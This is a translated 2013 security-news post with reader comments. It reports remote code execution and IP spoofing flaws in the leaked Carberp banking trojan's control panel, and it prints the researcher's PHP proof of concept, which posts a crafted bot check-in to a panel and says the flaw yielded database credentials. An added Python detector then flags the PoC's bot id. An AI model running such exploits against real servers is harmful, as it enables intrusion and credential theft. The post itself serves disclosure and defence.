Last week the source code of the Carberp banking trojan, a piece of crimeware worth a fortune, was leaked: 1.8 GB of data that researchers worldwide are now picking through. A French security researcher, Steven K (Xylitol), found something different in it: the Carberp control panel itself contains several security holes, among them an IP address spoofing flaw and a remote code execution flaw.
The researcher found that the "data" parameter of the Carberp Panel can be used for remote code execution, as shown in the screenshot below:
IP address spoofing vulnerability:
He also wrote a PoC:
```php
<!-- Carberp RCE -->
<table width="607" border="0">
  <tr>
    <td>
      <!-- Submit the panel's base URL (no trailing slash) back to this same script -->
      <form method="POST" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
        <label for="urlz">Domain: </label>
        <input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
        <input type="submit" name="button" id="button" value="Ownz !" />
      </form>
    </td>
  </tr>
  <tr>
    <td>
<?php
/* Xyl2k! Greeting to Xartrick for fixing the payload (: */
if (isset($_POST['urlz'])) {
    if (!filter_var($_POST['urlz'], FILTER_VALIDATE_URL)) {
        echo "<font color='red'>URL is not valid</font>";
    } else {
        // The panel's bot check-in request takes two POST fields: a bot id and
        // "data", the parameter the article identifies as the RCE sink.
        // The actual payload is elided on this page.
        $data = array(
            'id'   => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
            'data' => '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',
        );
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
        curl_setopt($ch, CURLOPT_HEADER, 0);
        // Mimic the bot's User-Agent so the panel treats the request as a check-in
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
        curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $contents = curl_exec($ch);
        curl_close($ch);
        // The PoC treats a '-' anywhere in the response as proof the payload ran.
        // Note the response is echoed unescaped, so a hostile panel could inject
        // HTML/JS into the operator's browser here.
        if (preg_match("#-#", $contents)) {
            echo "<pre>" . $contents . "</pre>";
        } else {
            echo "<font color='red'>Not vulnerable</font>";
        }
    }
}
?>
    </td>
  </tr>
</table>
```
Using the flaw he successfully pulled the database username, password and Auth Key out of a panel, as shown in the screenshot below:
In other words, this vulnerability lets you reap what others have sown: hack the hackers who run Carberp and walk off with the fruits of their labour.
Link to the French researcher's analysis:
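The PoC above hard-codes two things a defender can key on: the bot id `BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV` posted to `/index.php`, and the MSIE 6.0 User-Agent it sends with it. The following is an added example, not code from the article or from Xylitol's PoC, that runs that check over a few raw HTTP requests. The sample requests, the `panel.example` host, and the 256-byte `data` threshold in the weaker rule are constructed for illustration and are not indicators taken from the page.

```python
"""Flag HTTP POSTs that carry the hard-coded bot id used by the Carberp Panel PoC.

Added example, not code from the original article or from the PoC.  The sample
requests below are constructed, not captured traffic.
"""
from typing import Optional
from urllib.parse import parse_qs

# Indicators lifted verbatim from the PoC on this page.
POC_BOT_ID = "BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV"
POC_USER_AGENT = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

# Assumption for the weak rule: a "data" blob this large is unusual for a check-in.
LARGE_DATA_THRESHOLD = 256


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, path, headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # keep_blank_values so an empty data= field still shows up as present
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": path, "headers": headers, "fields": fields}


def classify(raw: str) -> Optional[str]:
    """Return a short verdict for one request, or None if nothing matched."""
    req = parse_request(raw)
    if req["method"] != "POST" or not req["path"].endswith("/index.php"):
        return None
    fields, headers = req["fields"], req["headers"]
    if fields.get("id") == POC_BOT_ID:
        # The exact bot id is the strong indicator; the UA is far too common on
        # its own, so it is only reported as corroboration.
        ua_match = headers.get("user-agent") == POC_USER_AGENT
        return "poc-bot-id" + ("+poc-ua" if ua_match else "")
    if "id" in fields and "data" in fields and len(fields["data"]) > LARGE_DATA_THRESHOLD:
        # Weaker: same two-field shape as the panel check-in with a large blob,
        # which is what a modified payload would look like.
        return "suspicious-id-data-post"
    return None


def scan(requests: list) -> list:
    """Run classify() over raw requests; return (index, verdict) for every hit."""
    hits = []
    for i, raw in enumerate(requests):
        verdict = classify(raw)
        if verdict:
            hits.append((i, verdict))
    return hits


def _post(path: str, fields: dict, ua: str) -> str:
    """Build a constructed form POST; values here contain no characters needing encoding."""
    body = "&".join(f"{k}={v}" for k, v in fields.items())
    return (f"POST {path} HTTP/1.1\r\nHost: panel.example\r\n"
            f"User-Agent: {ua}\r\nContent-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


# Constructed samples: PoC as-is, PoC with a different UA, an oversized check-in,
# a normal-looking check-in, and an unrelated GET.
SAMPLE_REQUESTS = [
    _post("/index.php", {"id": POC_BOT_ID, "data": "A" * 40}, POC_USER_AGENT),
    _post("/admin/index.php", {"id": POC_BOT_ID, "data": "A" * 40}, "curl/7.29.0"),
    _post("/index.php", {"id": "bot-0001", "data": "B" * 300}, POC_USER_AGENT),
    _post("/index.php", {"id": "bot-0002", "data": "ok"}, POC_USER_AGENT),
    "GET /index.php HTTP/1.1\r\nHost: panel.example\r\nUser-Agent: x\r\n\r\n",
]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE_REQUESTS):
        print(idx, verdict)
```

The weak rule is noisy by design: real bots talk to the same `index.php` with the same two fields, so only the exact bot id from the PoC is worth alerting on by itself; anything else needs the response side (the dumped credentials) before you call it an exploitation attempt.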
http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html
Discussion (no holds barred):
米歇尔.奥巴马 2013-07-02 #1
What programming language is that in the first and second screenshots?? I've never seen it before... someone please enlighten me~~
hume 2013-07-02
@米歇尔.奥巴马 Isn't it obviously PHP?
刘德华 2013-07-02
@hume You read it the wrong way round, it should be read backwards, php, that's the right way.
helen 2013-07-02
@米歇尔.奥巴马 You don't even know PHP ("拍黄片") and you want to do code audits?
EAGLE 2013-07-02 #2
So what's the signature?
rookit (level 1) 2013-07-02 #3
Holy crap
猥琐大叔 2013-07-02 #4
What an obvious backdoor
黑黑的白猫 (level 1) 2013-07-02 #5
Damn, a textbook case of hackers preying on hackers~~
落叶纷飞 (level 1) 00day.cn, site smasher, script kiddie, web security engineer 2013-07-02 #6
That's just how it is; these people didn't come from a web-dev background, so a panel riddled with holes is perfectly normal.
马化腾 2013-07-02 #7
This is obviously a backdoor the author planted before releasing it, how does that count as a vulnerability?
helen 2013-07-03 #8
Damn it, I didn't find this backdoor myself, but I have to say, isn't it way too obvious? The author wrote such an awesome trojan and yet couldn't manage a slightly better hidden backdoor, I have serious doubts! What's so great about Carberp? Is it better than GH0ST or 灰鸽子 (Gray Pigeon)? You're all out of date!
Fck4th (level 1) 2013-07-07
@helen You're brilliant~